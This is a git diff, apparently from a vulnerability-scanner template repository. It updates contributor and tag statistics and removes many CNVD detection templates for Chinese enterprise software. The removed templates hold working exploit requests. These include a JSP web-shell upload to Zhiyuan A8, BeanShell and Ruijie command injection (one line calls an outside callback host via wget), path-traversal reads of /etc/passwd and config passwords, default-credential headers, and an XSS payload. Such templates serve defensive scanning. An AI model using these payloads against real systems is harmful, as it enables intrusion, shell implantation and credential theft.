| edb | 597 | ritikchaddha | 217 | cves.json | 1 | | | | |
|
||||
| lfi | 557 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |
|
||||
|
||||
**335 directories, 5229 files**.
|
||||
**412 directories, 6679 files**.
|
||||
|
||||
</td>
|
||||
</tr>
|
||||
|
|
File diff suppressed because one or more lines are too long
5732
TEMPLATES-STATS.md
5732
TEMPLATES-STATS.md
File diff suppressed because it is too large
Load Diff
24
TOP-10.md
24
TOP-10.md
|
@ -1,12 +1,12 @@
|
|||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
|
||||
| cve | 1552 | dhiyaneshdk | 701 | cves | 1529 | info | 1671 | http | 4330 |
|
||||
| panel | 780 | daffainfo | 662 | exposed-panels | 782 | high | 1152 | file | 78 |
|
||||
| edb | 582 | pikpikcu | 344 | vulnerabilities | 520 | medium | 837 | network | 77 |
|
||||
| exposure | 551 | pdteam | 274 | misconfiguration | 361 | critical | 552 | dns | 17 |
|
||||
| xss | 543 | geeknik | 206 | technologies | 322 | low | 281 | | |
|
||||
| lfi | 519 | pussycat0x | 172 | exposures | 308 | unknown | 25 | | |
|
||||
| wordpress | 471 | dwisiswant0 | 171 | token-spray | 236 | | | | |
|
||||
| cve2021 | 370 | 0x_akoko | 170 | workflows | 190 | | | | |
|
||||
| wp-plugin | 366 | ritikchaddha | 164 | default-logins | 116 | | | | |
|
||||
| tech | 360 | princechaddha | 153 | file | 78 | | | | |
|
||||
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|
||||
|-----------|-------|--------------|-------|----------------------|-------|----------|-------|------|-------|
|
||||
| cve | 1908 | dhiyaneshdk | 882 | http | 5970 | info | 2907 | file | 130 |
|
||||
| panel | 909 | dwisiswant0 | 796 | workflows | 190 | high | 1298 | dns | 18 |
|
||||
| wordpress | 787 | daffainfo | 664 | file | 130 | medium | 1076 | | |
|
||||
| exposure | 692 | pikpikcu | 353 | network | 98 | critical | 717 | | |
|
||||
| wp-plugin | 678 | pdteam | 280 | ssl | 24 | low | 224 | | |
|
||||
| xss | 660 | pussycat0x | 258 | dns | 18 | unknown | 27 | | |
|
||||
| osint | 652 | geeknik | 221 | headless | 9 | | | | |
|
||||
| tech | 614 | ricardomaia | 220 | contributors.json | 1 | | | | |
|
||||
| edb | 597 | ritikchaddha | 217 | cves.json | 1 | | | | |
|
||||
| lfi | 557 | 0x_akoko | 179 | TEMPLATES-STATS.json | 1 | | | | |
|
||||
|
|
|
@ -1,38 +0,0 @@
|
|||
id: CNVD-2017-03561
|
||||
|
||||
info:
|
||||
name: Panwei eMobile - OGNL Injection
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: Panwei eMobile contains an object graph navigation library vulnerability. An attacker can inject arbitrary JavaScript, thus possibly obtaining sensitive information from a database, modifying data, and executing unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://gitee.com/cute-guy/Penetration_Testing_POC/blob/master/%E6%B3%9B%E5%BE%AEe-mobile%20ognl%E6%B3%A8%E5%85%A5.md
|
||||
- https://reconshell.com/vulnerability-research-list/
|
||||
metadata:
|
||||
verified: true
|
||||
fofa-query: app="泛微-eMobile"
|
||||
tags: cnvd,cnvd2017,emobile,ognl,panwei
|
||||
|
||||
variables:
|
||||
num1: "9999"
|
||||
num2: "5555"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/login.do?message={{num1}}*{{num2}}"
|
||||
- "{{BaseURL}}/login/login.do?message={{num1}}*{{num2}}"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '55544445'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/09/30
|
|
@ -1,32 +0,0 @@
|
|||
id: CNVD-2018-13393
|
||||
|
||||
info:
|
||||
name: Metinfo - Local File Inclusion
|
||||
author: ritikchaddha
|
||||
severity: high
|
||||
description: Metinfo is susceptible to local file inclusion.
|
||||
reference:
|
||||
- https://paper.seebug.org/676/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cwe-id: CWE-22
|
||||
tags: metinfo,cnvd,cvnd2018,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/include/thumb.php?dir=http\..\admin\login\login_check.php'
|
||||
|
||||
host-redirects: true
|
||||
max-redirects: 2
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<?php"
|
||||
- "login_met_cookie($metinfo_admin_name);"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/07/05
|
|
@ -1,37 +0,0 @@
|
|||
id: CNVD-2019-01348
|
||||
|
||||
info:
|
||||
name: Xiuno BBS CNVD-2019-01348
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: The Xiuno BBS system has a system reinstallation vulnerability. The vulnerability stems from the failure to protect or filter the installation directory after the system is installed. Attackers can directly reinstall the system through the installation page.
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2019-01348
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cwe-id: CWE-284
|
||||
remediation: Upgrade to the latest version of Xiuno BBS or switch to a supported product.
|
||||
tags: xiuno,cnvd,cnvd2019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/install/"
|
||||
headers:
|
||||
Accept-Encoding: deflate
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "/view/js/xiuno.js"
|
||||
- "Choose Language (选择语言)"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/01/26
|
|
@ -1,37 +0,0 @@
|
|||
id: CNVD-2019-06255
|
||||
|
||||
info:
|
||||
name: CatfishCMS RCE
|
||||
author: Lark-Lab
|
||||
severity: critical
|
||||
description: CatfishCMS 4.8.54 contains a remote command execution vulnerability in the "method" parameter.
|
||||
reference:
|
||||
- https://its401.com/article/yun2diao/91344725
|
||||
- https://github.com/xwlrbh/Catfish/issues/4
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
remediation: Upgrade to CatfishCMS version 4.8.54 or later.
|
||||
tags: rce,cnvd,catfishcms,cnvd2019
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- 'OS'
|
||||
- 'PATH'
|
||||
- 'SHELL'
|
||||
- 'USER'
|
||||
condition: and
|
||||
|
||||
# Enhanced by cs on 2022/02/28
|
|
@ -1,54 +0,0 @@
|
|||
id: CNVD-2019-19299
|
||||
|
||||
info:
|
||||
name: Zhiyuan A8 - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Zhiyuan A8 is susceptible to remote code execution because of an arbitrary file write issue.
|
||||
reference:
|
||||
- https://www.cxyzjd.com/article/guangying177/110177339
|
||||
- https://github.com/sectestt/CNVD-2019-19299
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: zhiyuan,cnvd,cnvd2019,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /seeyon/htmlofficeservlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Pragma: no-cache
|
||||
Cache-Control: no-cache
|
||||
Upgrade-Insecure-Requests: 1
|
||||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q =0.8,application/signed-exchange;v=b3
|
||||
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
|
||||
Connection: close
|
||||
|
||||
DBSTEP V3. 0 343 0 658 DBSTEP=OKMLlKlV
|
||||
OPTION=S3WYOSWLBSGr
|
||||
currentUserId=zUCTwigsziCAPLesw4gsw4oEwV66
|
||||
= WUghPB3szB3Xwg66 the CREATEDATE
|
||||
recordID = qLSGw4SXzLeGw4V3wUw3zUoXwid6
|
||||
originalFileId = wV66
|
||||
originalCreateDate = wUghPB3szB3Xwg66
|
||||
FILENAME = qfTdqfTdqfTdVaxJeAJQBRl3dExQyYOdNAlfeaxsdGhiyYlTcATdb4o5nHzs
|
||||
needReadFile = yRWZdAS6
|
||||
originalCreateDate IZ = 66 = = wLSGP4oEzLKAz4
|
||||
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder ();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine( )) != null) {line.append(temp+"\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString() ;} %><%if("x".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("{{randstr}}"))){out.println("<pre>" +excuteCmd(request.getParameter("{{randstr}}")) + "</pre>");}else{out.println(":-)");}%>6e4f045d4b8506bf492ada7e3390d7ce
|
||||
|
||||
- |
|
||||
GET /seeyon/test123456.jsp?pwd=asasd3344&{{randstr}}=ipconfig HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
req-condition: true
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'status_code_2 == 200'
|
||||
- 'contains(body_1, "htmoffice operate")'
|
||||
- 'contains(body_2, "Windows IP")'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,30 +0,0 @@
|
|||
id: CNVD-2019-32204
|
||||
|
||||
info:
|
||||
name: Fanwei e-cology <=9.0 - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: Fanwei e-cology <=9.0 is susceptible to remote code execution vulnerabilities. Remote attackers can directly execute arbitrary commands on the target server by invoking the unauthorized access problem interface in the BeanShell component. Currently, the security patch for this vulnerability has been released. Please take protective measures as soon as possible for users who use the Fanwei e-cology OA system.
|
||||
reference:
|
||||
- https://blog.actorsfit.com/a?ID=01500-11a2f7e6-54b0-4a40-9a79-5c56dc6ebd51
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: fanwei,cnvd,cnvd2019,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /bsh.servlet.BshServlet HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
bsh.script=exec("cat+/etc/passwd");&bsh.servlet.output=raw
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,34 +0,0 @@
|
|||
id: CNVD-2020-23735
|
||||
|
||||
info:
|
||||
name: Xxunchi CMS - Local File Inclusion
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: Xunyou CMS is vulnerable to local file inclusion. Attackers can use vulnerabilities to obtain sensitive information.
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/2025171
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cwe-id: CWE-22
|
||||
tags: xunchi,lfi,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/backup/auto.php?password=NzbwpQSdbY06Dngnoteo2wdgiekm7j4N&path=../backup/auto.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "NzbwpQSdbY06Dngnoteo2wdgiekm7j4N"
|
||||
- "display_errors"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/07/22
|
|
@ -1,32 +0,0 @@
|
|||
id: CNVD-2020-46552
|
||||
|
||||
info:
|
||||
name: Sangfor EDR - Remote Code Execution
|
||||
author: ritikchaddha
|
||||
severity: critical
|
||||
description: Sangfor Endpoint Monitoring and Response Platform (EDR) contains a remote code execution vulnerability. An attacker could exploit this vulnerability by constructing an HTTP request which could execute arbitrary commands on the target host.
|
||||
reference:
|
||||
- https://www.modb.pro/db/144475
|
||||
- https://blog.csdn.net/bigblue00/article/details/108434009
|
||||
- https://cn-sec.com/archives/721509.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: cnvd,cnvd2020,sangfor,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/tool/log/c.php?strip_slashes=printf&host=nl+c.php"
|
||||
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body, "$show_input = function($info)")'
|
||||
- 'contains(body, "$strip_slashes($host)")'
|
||||
- 'contains(body, "Log Helper")'
|
||||
- 'status_code == 200'
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/18
|
|
@ -1,34 +0,0 @@
|
|||
id: CNVD-2020-56167
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb - Default Password
|
||||
author: pikpikcu
|
||||
severity: low
|
||||
description: Ruijie Smartweb contains a vulnerability via the default password. An attacker can successfully bypass entering required credentials, thus possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2020-56167
|
||||
- https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner
|
||||
tags: ruijie,default-login,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/WEB_VMS/LEVEL15/"
|
||||
headers:
|
||||
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
|
||||
body: command=show basic-info dev&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "Level was: LEVEL15"
|
||||
- "/WEB_VMS/LEVEL15/"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/09/30
|
|
@ -1,35 +0,0 @@
|
|||
id: CNVD-2020-62422
|
||||
|
||||
info:
|
||||
name: Seeyon - Local File Inclusion
|
||||
author: pikpikcu
|
||||
severity: medium
|
||||
description: Seeyon is vulnerable to local file inclusion.
|
||||
reference:
|
||||
- https://blog.csdn.net/m0_46257936/article/details/113150699
|
||||
tags: lfi,cnvd,cnvd2020,seeyon
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/seeyon/webmail.do?method=doDownloadAtt&filename=index.jsp&filePath=../conf/datasourceCtp.properties"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/x-msdownload"
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "ctpDataSource.password"
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/07/22
|
|
@ -1,51 +0,0 @@
|
|||
id: CNVD-2020-67113
|
||||
|
||||
info:
|
||||
name: H5S CONSOLE - Unauthorized Access
|
||||
author: ritikchaddha
|
||||
severity: medium
|
||||
description: H5S CONSOLE is susceptible to an unauthorized access vulnerability.
|
||||
reference:
|
||||
- https://vul.wangan.com/a/CNVD-2020-67113
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cwe-id: CWE-425
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: http.title:"H5S CONSOLE"
|
||||
tags: cnvd,cnvd2020,h5s,unauth,h5sconsole
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/api/v1/GetSrc"
|
||||
- "{{BaseURL}}/api/v1/GetDevice"
|
||||
|
||||
stop-at-first-match: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'strUser'
|
||||
- 'strPasswd'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'H5_AUTO'
|
||||
- 'H5_DEV'
|
||||
condition: or
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "application/json"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,50 +0,0 @@
|
|||
id: CNVD-2020-68596
|
||||
|
||||
info:
|
||||
name: WeiPHP 5.0 - Path Traversal
|
||||
author: pikpikcu
|
||||
description: WeiPHP 5.0 is susceptible to directory traversal attacks.
|
||||
severity: high
|
||||
reference:
|
||||
- http://wiki.peiqi.tech/PeiQi_Wiki/CMS%E6%BC%8F%E6%B4%9E/Weiphp/Weiphp5.0%20%E5%89%8D%E5%8F%B0%E6%96%87%E4%BB%B6%E4%BB%BB%E6%84%8F%E8%AF%BB%E5%8F%96%20CNVD-2020-68596.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cwe-id: CWE-22
|
||||
tags: weiphp,lfi,cnvd,cnvd2020
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
"1":1
|
||||
- |
|
||||
GET /public/index.php/home/file/user_pics HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
|
||||
- |
|
||||
GET {{endpoint}} HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: endpoint
|
||||
part: body
|
||||
internal: true
|
||||
regex:
|
||||
- '/public/uploads/picture/(.*.jpg)'
|
||||
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- https://weiphp.cn
|
||||
- WeiPHP
|
||||
- DB_PREFIX
|
||||
condition: and
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,37 +0,0 @@
|
|||
id: CNVD-2021-01931
|
||||
|
||||
info:
|
||||
name: Ruoyi Management System - Local File Inclusion
|
||||
author: daffainfo,ritikchaddha
|
||||
severity: high
|
||||
description: The Ruoyi Management System contains a local file inclusion vulnerability that allows attackers to retrieve arbitrary files from the operating system.
|
||||
reference:
|
||||
- https://disk.scan.cm/All_wiki/%E4%BD%A9%E5%A5%87PeiQi-WIKI-POC-2021-7-20%E6%BC%8F%E6%B4%9E%E5%BA%93/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E8%8B%A5%E4%BE%9D%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F%20%E5%90%8E%E5%8F%B0%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%20CNVD-2021-01931.md?hash=zE0KEPGJ
|
||||
tags: ruoyi,lfi,cnvd,cnvd2021
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cwe-id: CWE-22
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../etc/passwd"
|
||||
- "{{BaseURL}}/common/download/resource?resource=/profile/../../../../Windows/win.ini"
|
||||
|
||||
matchers-condition: or
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "bit app support"
|
||||
- "fonts"
|
||||
- "extensions"
|
||||
condition: and
|
||||
|
||||
# Enhanced by cs on 06/03/2022
|
|
@ -1,34 +0,0 @@
|
|||
id: CNVD-2021-09650
|
||||
|
||||
info:
|
||||
name: Ruijie Networks-EWEB Network Management System - Remote Code Execution
|
||||
author: daffainfo,pikpikcu
|
||||
severity: critical
|
||||
description: Ruijie EWEB Gateway Platform is susceptible to remote command injection attacks.
|
||||
reference:
|
||||
- http://j0j0xsec.top/2021/04/22/%E9%94%90%E6%8D%B7EWEB%E7%BD%91%E5%85%B3%E5%B9%B3%E5%8F%B0%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/
|
||||
- https://github.com/yumusb/EgGateWayGetShell_py/blob/main/eg.py
|
||||
- https://www.ruijienetworks.com
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10.0
|
||||
cwe-id: CWE-77
|
||||
tags: ruijie,cnvd,cnvd2021,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /guest_auth/guestIsUp.php
|
||||
Host: {{Hostname}}
|
||||
|
||||
mac=1&ip=127.0.0.1|wget {{interactsh-url}}
|
||||
|
||||
unsafe: true
|
||||
matchers:
|
||||
- type: word
|
||||
part: interactsh_protocol
|
||||
name: http
|
||||
words:
|
||||
- "http"
|
||||
|
||||
# Enhanced by mp on 2022/05/12
|
|
@ -1,33 +0,0 @@
|
|||
id: CNVD-2021-10543
|
||||
|
||||
info:
|
||||
name: EEA - Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: EEA is susceptible to information disclosure.
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-10543
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
|
||||
cvss-score: 5.3
|
||||
cwe-id: CWE-200
|
||||
tags: config,exposure,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/authenticationserverservlet"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "<username>(.*?)</username>"
|
||||
- "<password>(.*?)</password>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/05
|
|
@ -1,45 +0,0 @@
|
|||
id: CNVD-2021-14536
|
||||
|
||||
info:
|
||||
name: Ruijie RG-UAC Unified Internet Behavior Management Audit System - Information Disclosure
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Ruijie RG-UAC Unified Internet Behavior Management Audit System is susceptible to information disclosure. Attackers could obtain user accounts and passwords by reviewing the source code of web pages, resulting in the leakage of administrator user authentication information.
|
||||
reference:
|
||||
- https://www.adminxe.com/2163.html
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cwe-id: CWE-522
|
||||
metadata:
|
||||
fofa-query: title="RG-UAC登录页面"
|
||||
tags: ruijie,cnvd,cnvd2021,disclosure
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/get_dkey.php?user=admin"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '"pre_define"'
|
||||
- '"auth_method"'
|
||||
- '"name"'
|
||||
- '"password"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
part: body
|
||||
group: 1
|
||||
regex:
|
||||
- '"role":"super_admin",(["a-z:,0-9]+),"lastpwdtime":'
|
||||
|
||||
# Enhanced by mp on 2022/03/28
|
|
@ -1,32 +0,0 @@
|
|||
id: CNVD-2021-15822
|
||||
|
||||
info:
|
||||
name: ShopXO Download File Read
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
reference:
|
||||
- https://mp.weixin.qq.com/s/69cDWCDoVXRhehqaHPgYog
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"ShopXO企业级B2C电商系统提供商"
|
||||
fofa-query: app="ShopXO企业级B2C电商系统提供商"
|
||||
tags: shopxo,lfi,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/17
|
|
@ -1,36 +0,0 @@
|
|||
id: CNVD-2021-15824
|
||||
|
||||
info:
|
||||
name: EmpireCMS DOM Cross Site-Scripting
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: EmpireCMS is vulnerable to a DOM based cross-site scripting attack.
|
||||
reference:
|
||||
- https://sourceforge.net/projects/empirecms/
|
||||
- https://www.bilibili.com/read/cv10441910
|
||||
- https://vul.wangan.com/a/CNVD-2021-15824
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cwe-id: CWE-79
|
||||
tags: empirecms,cnvd,cnvd2021,xss,domxss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/e/ViewImg/index.html?url=javascript:alert(1)"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'if(Request("url")!=0)'
|
||||
- 'href=\""+Request("url")+"\"'
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/23
|
|
@ -1,36 +0,0 @@
|
|||
id: CNVD-2021-17369
|
||||
|
||||
info:
|
||||
name: Ruijie Smartweb Management System Password Information Disclosure
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: The wireless smartweb management system of Ruijie Networks Co., Ltd. has a logic flaw. An attacker can obtain the administrator account and password from a low-privileged user, thereby escalating the low-level privilege to the administrator's privilege.
|
||||
reference:
|
||||
- https://www.cnvd.org.cn/flaw/show/CNVD-2021-17369
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
|
||||
cvss-score: 8.3
|
||||
cwe-id: CWE-522
|
||||
tags: ruijie,disclosure,cnvd,cnvd2021
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web/xml/webuser-auth.xml"
|
||||
headers:
|
||||
Cookie: login=1; auth=Z3Vlc3Q6Z3Vlc3Q%3D; user=guest
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "<userauth>"
|
||||
- "<password>"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/16
|
|
@ -1,36 +0,0 @@
|
|||
id: CNVD-2021-26422
|
||||
|
||||
info:
|
||||
name: eYouMail - Remote Code Execution
|
||||
author: daffainfo
|
||||
severity: critical
|
||||
description: eYouMail is susceptible to a remote code execution vulnerability.
|
||||
reference:
|
||||
- https://github.com/ltfafei/my_POC/blob/master/CNVD-2021-26422_eYouMail/CNVD-2021-26422_eYouMail_RCE_POC.py
|
||||
